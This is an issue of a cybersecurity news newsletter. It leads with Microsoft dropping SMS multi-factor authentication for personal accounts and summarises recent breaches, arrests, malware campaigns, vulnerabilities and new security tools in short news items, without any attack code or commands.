Risky Bulletin

Risky Bulletin: Microsoft ends SMS MFA for personal accounts

In other news: GitHub hacked via VS Code extension; CISA to let researchers submit new KEV entries; SMS blaster detained at Eurovision.

Catalin Cimpanu

Catalin Cimpanu

14 min read
Share
Risky Bulletin: Microsoft ends SMS MFA for personal accounts

This newsletter is brought to you by Push Security. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business" in your podcatcher or subscribing via this RSS feed. You can also add the Risky Business newsletter as a Preferred Source to your Google search results by going here.

Microsoft is phasing out SMS as a multi-factor authentication and account recovery option for personal Microsoft accounts.

All users will be prompted to add a passkey the next time they log into their accounts.

The company said SMS was a leading source of fraud and the most targeted vector for account takeover.

Adopting passkeys only will also lead to faster login flows, since users don't have to wait around for an SMS to arrive, and a smoother and secure account recovery process since users aren't tied to a phone number anymore.

Passkeys are also phishing-resistant and superior to SMS MFA, which can be phished with special hacking tools called AitM phishing kits (sometimes reverse proxy phishing kits).

While these were a rarity decade ago, AitM phishing kits have become commonplace since 2019, when tools like Modlishka, Muraena, and Evilginx have served as a template and showed cybercrime groups how to intercept SMS MFA tokens in real-time.

Microsoft becomes the first major platform to abandon SMS MFA. Other platforms like Google, Facebook, and Twitter are pushing users by default to stronger MFA alternatives, but still allow them to use SMS as a last resort.

Risky Business Podcasts

The main Risky Business podcast is now on YouTube with video versions of our recent episodes. Below is our latest weekly show with Pat, Adam, and James at the helm!

Breaches, hacks, and security incidents

GitHub hacked via VS Code extension: Hackers have stolen GitHub's internal repos after an employee installed a malicious VS Code extension. More than 3,800 internal code repositories have been exfiltrated and are now being offered for sale on a hacking forum. GitHub says it's rotating critical secret tokens to prevent any future access to its assets. The malicious VS Code extension was identified as Nx Console, which itself was compromised in the TanStack supply chain attack last week. [GitHub // Nx Console incident // Leak analysis]

Grafana links recent hack to TanStack incident: Grafana also named the same TanStack incident as the source of its own hack, which took place just days before GitHub's. [Grafana]

Wahlap's leaky server: Chinese game arcade maker Wahlap has left exposed the personal details of almost 19 million customers. The data leaked via an Elasticsearch database that was left unprotected on the internet. The data was tied to customers' WeChat accounts and included phone numbers and full names. It remained online for at least two months until the server was secured. [Cybernews]

Northern Mariana incident: A cyberattack has disrupted the email servers of the government of the Northern Mariana Islands. Officials from the US territory did not specify if this was a ransomware attack. The incident is expected to slow down administrative tasks. [DysruptionHub]

Russia hacks BlueSky accounts for disinfo ops: Russia has hacked BlueSky accounts to post pro-Kremlin and anti-Ukraine propaganda. The hacks have been going on since April. BlueSky has been suspending accounts until owners could step in and resecure them. The propaganda posted on the hacked accounts is the work of a Russian disinformation group known as Matryoshka. [NYT // Clemson University]

Patel's store gets hacked: Kash Patel's "Based Apparel" online store has been hacked and is hosting ClickFix pages. [International Cyber Digest]

Trump Mobile leaked user data: Trump Mobile has fixed a bug on its official website that exposed the data of users who signed up for the company's gold-colored smartphone. The website allegedly exposed emails, physical addresses, and full names. The company was allegedly notified of the bug in advance but did not fix the issue. It patched the bug only after several YouTubers covered the leak. Trump Mobile has been accused of scamming its customers after it has yet to ship any of the Trump-themed phones customers ordered. [PCMag]

General tech and privacy

Tails removes Thunderbird: The Tor Project has removed the Thunderbird email client from the Tails privacy OS because of the timing of the release calendars, the version that shipped with Tails was almost always outdated and contained vulnerabilities. [The Tor Project]

Dutch asks EU for help against bad ads: The Dutch consumer protection agency has asked national and EU regulators to take action against Google, Meta, and TikTok. The agency says the companies are not removing malicious ads from their platforms and are not replying to reports. Meta and TikTok were the worst abusers, leaving between 70 and 80% of the malicious ads in place. Polish authorities accused Meta of the same behavior last year. Reuters won a Pulitzer prize this year for reporting on Meta's quiet acceptance of fraud on its platform. [Consumentenbond]

Apple blocked 1.1b new fraudulent accounts: Apple has blocked threat actors from creating 1.1 billion new accounts that were intended to be used for online fraud. Apple also deactivated more than 40 million user accounts that had engaged in fraud last year. In total, the company says it blocked more than 5.4 million stolen cards from being used on its platform and prevented $2 billion in fraudulent transactions. [Apple]

Government, politics, and policy

Russia's growing software security issues: Around a third of Russian companies are using Western software acquired before 2022, before Russia's invasion of Ukraine. Most of the software doesn't receive technical support and security updates. The highest concentration of Western software is in the corporate email vertical. Microsoft still holds 50% of the Russian market through its Exchange and Microsoft365 products. [Kommersant]

Armenia faces waves of disinformation: Ahead of its June 7 parliamentary elections, Armenia's pro-EU forces are facing a generational wave of Russian disinformation, on the same level of absurdity that Moldova faced last year and Hungary this year, with Russian trolls spreading rumors that the pro-EU government and ministries are corrupt, have AIDS, and are all on drugs. Literally copy-pasted stuff from other countries. Groups like Matryoshka (SDA) and Storm-1516 are behind the campaigns. [The Insider // Euronews]

Dems want answers on CISA leak: US Senator Maggie Hassan, a member of the Senate Homeland Security Committee, has requested a classified briefing with CISA on the agency's recent leak, where a contractor leaked sensitive cloud keys for CISA's server infrastructure. [Sen. Maggie Hassan]

White House postpones AI security EO: After countless rumors that the White House was publishing an executive order on Friday on AI security, officials have postponed it hours before it was set to be signed. [CyberScoop]

CISA to let researchers submit vulns to KEV: US cybersecurity agency CISA will let security researchers and other third parties submit reports of actively exploited vulnerabilities. If confirmed, the submissions will be added to the CISA KEV database. The agency has launched a new web form where researchers can file reports. CISA's KEV database has fallen behind in recent months and has been repeatedly criticized for not containing information on all actively exploited bugs. [CISA]

In this Risky Business sponsor interview, James Wilson chats with Push Security’s Chief Research Officer Jacques Louw about how the company has integrated an army of AI agents into its threat detection platform. Not only has agentic AI led to the discovery of Install Fix campaigns, but it will help simplify the platform for new customers. 

Arrests, cybercrime, and threat intel

Ukraine detains infostealer operator: Ukraine's Cyber Police has arrested an 18-year-old who used an infostealer to hijack online accounts and make unauthorized transactions. The teen allegedly hacked more than 28,000 accounts and made more than 5,800 transactions totalling more than $721,000. He was also selling some of the hacked accounts and associated session tokens. [Ukraine's Cyber Police]

Execs plead guilty for tech support scams: Two American nationals have pleaded guilty to providing server infrastructure services through their company to telemarketing and tech-support fraud schemes. [DOJ]

SMS blaster detained at Eurovision: Austrian tactical forces have arrested a 32-year-old Chinese national on cybercrime charges. The suspect was arrested with an SMS blaster in his car outside the Eurovision song contest in Vienna last weekend. The man was also charged with endangering his 6-year-old son who was also in the car with him. [Austrian Police // CommsRisk]

Kimwolf admin arrested in Canada: A Canadian national was arrested by authorities for running the Kimwolf DDoS botnet. Jacob Butler was detained in Ottawa by Canadian police this week. He is charged with building and renting out the botnet, which was used in more than 25,000 attacks last year. US and European authorities took down the botnet in a joint operation in March. [DOJ]

First VPN takedown: Authorities in France and the Netherlands have seized the servers of a VPN service used by cybercrime gangs. The First VPN service has operated for years and was mainly advertised on Russian-speaking hacking forums. Across the years, it was used in large-scale fraud, data theft, and ransomware attacks. Authorities arrested the service's admin in Ukraine, took down 33 servers, and seized four domains. [Europol // FBI industry alert, PDF]

Coruna found on npm: A version of the Coruna iOS exploit kit has been found on the npm portal. The exploit kit was the final payload hidden in Art-Template, a popular JavaScript template engine. The infected template engine deployed Coruna to search for iOS users, hack their devices, and steal crypto-wallet data. The Coruna exploit kit was initially used for covert espionage campaigns but was also linked to Chinese e-crime operations after its code got stolen and sold. [SafeDep // Socket Security]

Kali365 PSA: The FBI has published a public service announcement on the rise of Kali365, a phishing platform capable of carrying out AitM operations to bypass MFA and device code phishing. [FBI]

Chinese data broker ecosystem: Security researchers look at the top 5 largest data trading platforms in the Chinese underground—Exchange Market (交易市场, Deepmix), Chang’An Sleepless Night (长安不夜城), Aiqianjin (爱钱进), Yiqun Data (义群数据), and the Phoenix Overseas Resources (凤凰海外资源). [Group-IB]

The STC problem: The Saudi Telecom Company has been found to host almost three-quarters of all malware command-and-control servers targeting the MENA region. [Hunt Intelligence]

Ghost CMS campaign: A hacking campaign is planting FakeCaptcha pages and malware on websites built with the Ghost CMS. The attacks began this month and are exploiting a vulnerability disclosed in February. At least two threat actors are conducting campaigns in parallel. More than 700 websites have been hacked so far. [QiAnXin // CVE-2026-26980]

Prompt injections in the wild: PAN's Unit42 joins Google and Forcepoint in seeing AI prompt injection attacks in the wild. [Palo Alto Networks]

Megalodon campaign hits GitHub: An automated campaign has tried to backdoor more than 5,500 GitHub repositories. The attackers used malicious commits that deployed a GitHub Action on the targeted repositories. The Action ran a bash script that stole CI secrets, cloud credentials, SSH keys, and other tokens. [SafeDep]

Gemini and Claude SERP poisoning: Google Search is drowning in malicious search results that lead users to malware if they search for Gemini and Claude AI-related terms. This comes days after Google announced it was abandoning its classic search for an AI experience. [EclecticIQ]

TamperedChef campaigns: Palo Alto looks at several threat actor clusters that have been spreading the TamperedChef infostealer disguised as various types of free Windows apps. [Palo Alto Networks]

Android carrier billing fraud: A cluster of more than 250 Android apps is engaging in billing fraud by subscribing users to premium SMS services. The apps have made victims in Malaysia, Thailand, Romania, and Croatia. The apps abuse popular brands and are hosted on third-party sites. [Zimperium]

Spammers abuse Microsoft internal email: A threat actor has found a way to abuse an internal Microsoft email to send out massive waves of spam with all sorts of scams and lures. The email abused in the campaign (msonlineservicesteam@microsoftonline[. ]com) is typically used for official Microsoft notifications, which makes this campaign particularly dangerous and effective. [Spamhaus // TechCrunch]

Post by @zackwhittaker@mastodon.social
View on Mastodon

Malware technical reports

CypherLoc screen locker: Here's something you haven't seen in a while. A browser-based screen locker distributed via email spam. [Barracuda]

In this wholly sponsored Soap Box edition of the show, Patrick Gray chats with Adam Bateman and Luke Jennings from Push Security

APTs, cyber-espionage, and info-ops

Operation Dragon Whistle: A threat actor tracked as UNG0002 is behind an extremely targeted spear-phishing campaign targeting students and faculty at Changzhou University in China. [Seqrite]

"What makes this campaign particularly effective is the precision of its social engineering. The threat actor did not use a generic lure — they specifically identified that Changzhou University conducts mandatory annual fitness assessments where failure directly impacts graduation eligibility. This creates an environment of urgency and compliance that significantly increases the probability of victim engagement."

Webworm APT: A Chinese APT group known as Webworm has shifted its operations from Asia to Europe last year. For some operations, the group used Discord as a C2, allowing  researchers to retrieve data on some past attacks. [ESET]

The DPRK on npm, again: A DPRK infostealer and RAT was found in the four npm packages this week. [Ox Security]

UAC-0244 targets drone operators: Researchers have spotted a malware campaign "clearly" targeting Ukrainian FPV drone operators. [Synaptic Systems]

UAC-0057 (UNC1151) targets Prometheus platform: A cyber-espionage group is targeting professionals in Ukraine who are seeking to obtain certificates through the Linux Foundation Prometheus platform. [CERT-UA]

ZionSiphon: DomainTools has a pretty deep dive into ZionSiphone, the Iranian data wiper that was coded with AI and attempted to wipe IT systems at Israeli water utilities. [DomainTools]

Vulnerabilities, security research, and bug bounty

Security updates: BIND9, Cisco, Dify, Drupal, HP, Mastodon, PowerDNS, Symfony, Tails, Twig, ZKTeco.

Google API keys live for a short while after deletion: Google API keys will continue working for about 23 minutes on average after being deleted, most likely as they're phased out of caches. This is an important detail for anyone doing IR. [Aikido Security]

Security audit of n8n templates: A security audit of 12,700+ n8n templates has found 716 workflows with at least one pre-authentication vulnerability an attacker can reach via the public internet. [AIronClaw]

Apple unrestricted filesystem access: Apple patched a bug last month in the Archive Utility that allowed nearly unrestricted access to the macOS filesystem. Tracked as CVE-2026-28910. [Thomas Mysk]

Google exposes major Chromium bug: Google has accidentally revealed details about an unfixed vulnerability in Chromium-based browsers. The bug allows threat actors to execute remote code and maintain persistent connections to affected browsers. The issue was first reported in 2022 and is still unfixed after four years. It was set to private again after a few hours exposed online. [ArsTechnica // Lyra Rebane thread]

Post by @rebane2001@infosec.exchange
View on Mastodon

YellowKey mitigations: Microsoft has assigned a CVE to the YellowKey BitLocker bypass vulnerability disclosed last week and has shared mitigation advice until a patch is ready. [CVE-2026-45585]

PinTheft vulnerability: There's another Linux LPE in the wild, this one named PinTheft. The vulnerability impacts only distros where the RDS kernel module is enabled, such as Arch Linux. [V12 Security]

Another Linux LPE: The Linux project has published patches for a vulnerability that can enable local privilege escalation. The vulnerability exploits an authorization bypass and race condition in the Linux ptrace process to allow malicious local apps to run commands as root. Security firm Qualys, which found the bug, has released four separate proof-of-concepts to show how the bug can be used to target various local Linux services like SSH and the accounts daemon. [Qualys // CVE-2026-46333]

NGINX-PoolSlip: After we had the NGINX Rift vulnerability disclosed last week, there's now another RCE in the NGINX server, this one named NGINX-PoolSlip. Details about this one will be published 30 days after a patch is released, to prevent exploitation, which is now happening against NGINX Rift. [Nebula Security]

Windows Defender zero-days: Microsoft has released an out-of-band security update to fix two Windows Defender zero-days. The two bugs have been exploited in the wild to crash the Defender service and elevate an attacker's privileges. The two bugs were added to CISA's KEV database on Wednesday, along with five other Adobe and Microsoft vulnerabilities. [CVE-2026-45498 and CVE-2026-41091]

Four-Faith exploitation: Several botnets have adopted a 2024 vulnerability in Four-Faith industrial routers in their arsenals. [CrowdSec]

Cisco patches major CSW bug: Cisco has patched a major vulnerability in its Secure Workload platform. The vulnerability can allow a remote unauthenticated attacker to send malcrafted API requests and run malicious code as Site Admin on the platform. Previously known as Tetration, the Cisco Secure Workload is used to micro-segment networks spread across multiple cloud platforms. The vulnerability has a severity rating of 10/10. [CVE-2026-20223]

Drupal fixes highly-critical SQLi: Drupal has released a security update to patch a "highly-critical" SQL injection affecting all current versions of the CMS. The vulnerability only impacts Drupal sites running on PostgreSQL databases and  can be exploited by remote unauthenticated users. The Drupal team estimates that only 5% of all sites are impacted, but exploitation is trivial. [CVE-2026-9082]

Infosec industry

Threat/trend reports: CERT-FR, CloudBees [PDF], Dutch CBS, ISC2, the National Security and Defense Council of Ukraine, Rapid7, Synack, and WatchGuard have recently published reports and summaries covering various threats and infosec industry trends.

New tool—RAMPART: Microsoft has open-sourced RAMPART, an agent test framework for encoding adversarial and benign scenarios as repeatable tests that can run in a CI/CD.

New tool—Clarity: Microsoft has open-sourced Clarity, an AI agent for software engineers that asks them questions about the apps and code they're building.

New tool—OpenHack: Security firm Hadrian has open-sourced OpenHack, a tool for AI-powered source code review.

New tool—VeilGate: Security researcher Jai Kandepu has released VeilGate, an open-source deception proxy to raise the cost of automated security probing.

BSides Prishtina 2025 videos: Talks from the BSides Prishtina 2025 security conference, which took place in April last year, are available on YouTube

Risky Business podcasts

In this edition of Seriously Risky Business, Tom Uren and James Wilson talk about moves from several European governments to ditch Signal and set up their own encrypted messaging systems for internal government use. 

In this episode of Risky Business Features, Ollie Whitehouse, the CTO of the UK’s National Cyber Security Centre, joins Patrick Gray and James Wilson to talk about why “patch faster” will only get organisations so far in the face of the AI "bugpocalypse."

Read more